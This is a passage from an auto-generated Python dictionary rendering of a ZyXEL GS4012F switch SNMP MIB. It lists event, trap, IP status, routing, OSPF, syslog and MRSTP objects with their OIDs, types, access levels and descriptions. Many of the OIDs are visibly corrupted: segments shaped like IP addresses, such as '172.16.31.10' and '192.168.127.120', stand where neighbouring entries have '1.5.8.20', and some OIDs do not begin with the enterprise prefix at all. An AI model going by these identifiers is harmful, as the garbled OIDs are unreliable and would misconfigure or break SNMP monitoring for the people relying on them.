"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "EventSeverity"},
},
"access" : "readonly",
"description" :
"""This variable dictates the urgency of action when a event
occurs. There are four severity levels - Critical, Major,
Minor, and Informational. Critical events are those, which
require immediate operator intervention to prevent/reduce
system down time. Major events require quick attention and
Minor events possibly require some attention. Informational
events indicate the occurrence of events that may need to be
investigated.""",
}, # column
"eventSetTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "UtcTimeStamp"},
},
"access" : "readonly",
"description" :
"""This table contains only normal events and this variable
represents the time when the event become active, i.e. the
number of seconds since Jan 1, 1970 12:00AM.""",
}, # column
"eventDescription" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.9",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "255"
},
],
"range" : {
"min" : "0",
"max" : "255"
},
},
},
"access" : "readonly",
"description" :
"""This variable contains a description of the event and reasons
behind the event. This is a free format alpha-numeric string
that is set by the entity generating this event. This variable
may be empty if there is no usefull information to report.
The maximum length of this string is 255 characters.""",
}, # column
"eventServAffective" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "EventServiceAffective"},
},
"access" : "readonly",
"description" :
"""This variable indicates whether the event is service affective or not""",
}, # column
"faultTrapsMIB" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37",
"status" : "current",
}, # node
"trapInfoObjects" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.1",
}, # node
"trapRefSeqNum" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Indicates the former sequence number of a cleared event
in the event table. Not intended to read but only used in
trap notifications.""",
}, # scalar
"trapPersistence" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "EventPersistence"},
},
"access" : "readonly",
"description" :
"""Indicates whether the event is delta (automatically and
immediately cleared) or normal (not automatically cleared).
Not intended to read but only used in trap notifications.""",
}, # scalar
"trapSenderNodeId" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Represents the node ID of the sending network element. If not
supported should be set to 0. Not intended to read but only
used in trap notifications.""",
}, # scalar
"trapNotifications" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.37.2",
}, # node
"ipStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38",
}, # node
"ipStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1",
"status" : "current",
"description" :
"""""",
}, # table
"ipStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1",
"status" : "current",
"linkage" : [
"ipStatusIPAddress",
"ipStatusVid",
],
"description" :
"""""",
}, # row
"ipStatusIPAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipStatusVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipStatusPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ipStatusType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.38.1.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"static" : {
"nodetype" : "namednumber",
"number" : "1"
},
"dynamic" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.39",
}, # node
"routingStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1",
"status" : "current",
"description" :
"""""",
}, # table
"routingStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1",
"status" : "current",
"linkage" : [
"routingStatusDestAddress",
],
"description" :
"""""",
}, # row
"routingStatusDestAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusDestMaskbits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusInterface" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusMetric" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routingStatusType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.39.1.1.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"rip" : {
"nodetype" : "namednumber",
"number" : "1"
},
"bgp" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ospf" : {
"nodetype" : "namednumber",
"number" : "3"
},
"static" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfExt" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40",
}, # node
"ospfInterfaceTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1",
"status" : "current",
"description" :
"""""",
}, # table
"ospfInterfaceEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1",
"status" : "current",
"linkage" : [
"ospfIfIpAddress",
"ospfAddressLessIf",
],
"description" :
"""""",
}, # row
"ospfIfKeyId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfIfMaskbits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfDesignatedRouterID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfBackupDesignatedRouterID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.172.16.31.10.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfNbrCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfAdjacentNbrCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfIfHelloDueTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.1.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfAreaExtTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.2",
"status" : "current",
"description" :
"""""",
}, # table
"ospfAreaExtEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.2.1",
"status" : "current",
"linkage" : [
"ospfAreaId",
],
"description" :
"""""",
}, # row
"ospfAreaExtName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfRedistributeRouteTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3",
"status" : "current",
"description" :
"""""",
}, # table
"ospfRedistributeRouteEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1",
"status" : "current",
"linkage" : [
"ospfRedistributeRouteProtocol",
],
"description" :
"""""",
}, # row
"ospfRedistributeRouteProtocol" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"rip" : {
"nodetype" : "namednumber",
"number" : "1"
},
"static" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfRedistributeRouteState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfRedistributeRouteType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfRedistributeRouteMetric" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfNbrExtTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4",
"status" : "current",
"description" :
"""""",
}, # table
"ospfNbrExtEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1",
"status" : "current",
"linkage" : [
"ospfNbrIpAddr",
"ospfNbrAddressLessIndex",
],
"description" :
"""""",
}, # row
"ospfNbrExtRole" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dr" : {
"nodetype" : "namednumber",
"number" : "1"
},
"backup" : {
"nodetype" : "namednumber",
"number" : "2"
},
"dr_other" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtDeadtime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtInterface" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtRXmtL" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtRqstL" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfNbrExtDBsmL" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.4.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfLsdbExtTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.5",
"status" : "current",
"description" :
"""""",
}, # table
"ospfLsdbExtEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.5.1",
"status" : "current",
"linkage" : [
"ospfLsdbAreaId",
"ospfLsdbType",
"ospfLsdbLSID",
"ospfLsdbRouterId",
],
"description" :
"""""",
}, # row
"ospfLsdbExtLinkCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfLsdbExtRouteAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.5.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfLsdbExtRouteMaskbits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.5.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"ospfVirtualLinkTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.6",
"status" : "current",
"description" :
"""""",
}, # table
"ospfVirtualLinkEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.40.6.1",
"status" : "current",
"linkage" : [
"ospfVirtIfAreaID",
"ospfVirtIfNeighbor",
],
"description" :
"""""",
}, # row
"ospfVirtualLinkName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ospfVirtualLinkKeyId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.40.6.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"sysLogSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.41",
}, # node
"sysLogState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""sysLog enabled/disabled for the switch.""",
}, # scalar
"sysLogTypeTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2",
"status" : "current",
"description" :
"""""",
}, # table
"sysLogTypeEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1",
"status" : "current",
"linkage" : [
"sysLogTypeIndex",
],
"description" :
"""An entry in sysLogTypeTable.""",
}, # row
"sysLogTypeIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"sysLogTypeName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"sysLogTypeState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"sysLogTypeFacility" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.2.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"local_user0" : {
"nodetype" : "namednumber",
"number" : "0"
},
"local_user1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"local_user2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"local_user3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"local_user4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"local_user5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"local_user6" : {
"nodetype" : "namednumber",
"number" : "6"
},
"local_user7" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"sysLogServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.41.3",
"status" : "current",
"description" :
"""""",
}, # table
"sysLogServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.41.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"sysLogServerAddress",
],
"description" :
"""An entry in sysLogServerTable.""",
}, # row
"sysLogServerAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.41.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"sysLogServerLogLevel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.41.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"level0" : {
"nodetype" : "namednumber",
"number" : "0"
},
"level0-1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"level0-2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"level0-3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"level0-4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"level0-5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"level0-6" : {
"nodetype" : "namednumber",
"number" : "6"
},
"level0-7" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"sysLogServerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.41.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mrstp" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42",
}, # node
"mrstpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1",
}, # node
"mrstpBridgeTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1",
"status" : "current",
"description" :
"""""",
}, # table
"mrstpBridgeEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1",
"status" : "current",
"linkage" : [
"mrstpBridgeIndex",
],
"description" :
"""An entry in mrstpBridgeTable.""",
}, # row
"mrstpBridgeIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The tree index of the MRSTP.""",
}, # column
"mrstpState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Enabled/disabled on the mrstp bridge.""",
}, # column
"mrstpProtocolSpecification" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"unknown" : {
"nodetype" : "namednumber",
"number" : "1"
},
"decLb100" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ieee8021d" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""An indication of what version of the Spanning
Tree Protocol is being run. The value
'decLb100(2)' indicates the DEC LANbridge 100
Spanning Tree protocol. IEEE 802.1d
implementations will return 'ieee8021d(3)'. If
future versions of the IEEE Spanning Tree Protocol
are released that are incompatible with the
current version a new value will be defined.""",
}, # column
"mrstpPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "65535"
},
],
"range" : {
"min" : "0",
"max" : "65535"
},
},
},
"access" : "readwrite",
"description" :
"""The value of the write-able portion of the Bridge
ID, i.e., the first two octets of the (8 octet
long) Bridge ID. The other (last) 6 octets of the
Bridge ID are given by the value of
dot1dBaseBridgeAddress.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.7""",
}, # column
"mrstpTimeSinceTopologyChange" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "TimeTicks"},
},
"access" : "readonly",
"description" :
"""The time (in hundredths of a second) since the
last time a topology change was detected by the
bridge entity.""",
"reference>" :
"""IEEE 802.1D-1990: Section 6.8.1.1.3""",
}, # column
"mrstpTopChanges" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.6",
"status" : "current",
"access" : "readonly",
"description" :
"""The total number of topology changes detected by
this bridge since the management entity was last
reset or initialized.""",
"reference>" :
"""IEEE 802.1D-1990: Section 6.8.1.1.3""",
}, # column
"mrstpDesignatedRoot" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
"""The bridge identifier of the root of the spanning
tree as determined by the Spanning Tree Protocol
as executed by this node. This value is used as
the Root Identifier parameter in all Configuration
Bridge PDUs originated by this node.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.1""",
}, # column
"mrstpRootCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The cost of the path to the root as seen from
this bridge.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.2""",
}, # column
"mrstpRootPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.42.1.1.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The port number of the port which offers the
lowest cost path from this bridge to the root
bridge.""",
"reference>" :
"""IEEE 802.1D-1990: Section 4.5.3.3""",
}, # column
"mrstpMaxAge" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.42.1.1.1.10",
